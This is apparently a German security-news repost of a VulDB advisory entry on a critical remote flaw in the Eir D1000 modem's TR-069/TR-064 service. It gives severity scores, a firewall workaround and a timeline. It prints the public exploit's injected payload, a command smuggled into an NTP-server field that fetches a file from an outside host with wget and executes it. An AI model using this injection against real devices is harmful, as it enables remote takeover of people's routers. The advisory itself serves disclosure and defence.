📚 Eir D1000 Modem TR-069 erweiterte Rechte

🕛 Zeit seit Veröffentlichung: 2715 Tage, 4 Stunden 6 Minuten
📆 Veröffentlicht am: 07.11.2016 um 01:00 Uhr
💡 Newskategorie: Sicherheitslücken
🔗 Quelle: vuldb.com

Eine sehr kritische Schwachstelle wurde in Eir D1000 Modem entdeckt. Dies betrifft eine unbekannte Funktion der Komponente TR-069. Durch das Beeinflussen mit einer unbekannten Eingabe kann eine erweiterte Rechte-Schwachstelle ausgenutzt werden. Das hat Auswirkungen auf Vertraulichkeit, Integrität und Verfügbarkeit.

Die Schwachstelle wurde am 07.11.2016 durch kenzo2017 als Eir’s D1000 Modem Is Wide Open To Being Hacked. in Form eines bestätigten Advisories (Website) veröffentlicht. Auf devicereversing.wordpress.com kann das Advisory eingesehen werden. Die Herausgabe geschah hierbei ohne Zusammenarbeit mit dem Hersteller. Die Schwachstelle ist relativ beliebt, was mitunter auf ihre geringe Komplexität zurückzuführen ist. Der Angriff kann über das Netzwerk passieren. Das Ausnutzen erfordert keine spezifische Authentisierung. Es sind zwar keine technische Details, jedoch ein öffentlicher Exploit zur Schwachstelle bekannt. Es muss davon ausgegangen werden, dass ein Exploit zur Zeit etwa USD $0-$5k kostet. Das Advisory weist darauf hin:

What is not very well known is that the server on port 7457 is also a TR-064 server. This is another protocol related to TR-069. It is also known as “LAN-Side CPE Configuration”. The idea behind this protocol is to allow the ISP to configure the modem from installation software supplied with the modem. The protocol is not supposed to be accessed from the WAN side of the modem but in the D1000 modem, we can send TR-064 commands to port 7547 on the WAN side. This allows us to “configure” the modem from the Internet.

Ein öffentlicher Exploit wurde in Python umgesetzt und sofort nach dem Advisory veröffentlicht. Er wird als hoch funktional gehandelt. Der Exploit wird unter devicereversing.wordpress.com zur Verfügung gestellt. Als 0-Day erzielte der Exploit wohl etwa $25k-$100k auf dem Schwarzmarkt. Der durch den Exploit genutzte Code gestaltet sich wie folgt:

<NewNTPServer1>
`cd /tmp;wget http://tr069.pw/1;chmod 777 1;./1`
</NewNTPServer1>

Die Schwachstelle kann durch das Filtern von tcp/7547 (tr-069) mittels Firewalling mitigiert werden.

Ein Bericht in deutscher Sprache wird mitunter durch Heise bereitgestellt.

Betroffen

Telekom Speedport Modem

CVSSv3

Base Score: 9.8 [?]
Temp Score: 9.6 [?]
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:W/RC:C [?]
Zuverlässigkeit: High

CVSSv2

Base Score: 10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C) [?]
Temp Score: 9.5 (CVSS2#E:H/RL:W/RC:C) [?]
Zuverlässigkeit: High

CPE

cpe:/a:eir:d1000_modem

Exploiting

Klasse: Erweiterte Rechte
Lokal: Nein
Remote: Ja

Verfügbarkeit: Ja
Zugang: öffentlich
Status: Hoch funktional
Programmiersprache: Python
Download: devicereversing.wordpress.com

Aktuelle Preisschätzung: $0-$5k (0-day) / $0-$5k (Heute)

Gegenmassnahmen

Empfehlung: Firewall
Status: Workaround
0-Day Time: 0 Tage seit gefunden
Exploit Delay Time: 0 Tage seit bekannt

Firewalling: tcp/7547 (tr-069)

Timeline

07.11.2016 Advisory veröffentlicht
07.11.2016 Exploit veröffentlicht
30.11.2016 VulDB Eintrag erstellt
30.11.2016 VulDB letzte Aktualisierung

Quellen

Advisory: Eir’s D1000 Modem Is Wide Open To Being Hacked.
Person: kenzo2017
Status: Bestätigt
Heise: 3507134

Eintrag

Erstellt: 30.11.2016
Eintrag: 73.8% komplett
...

🏠 Team IT Security News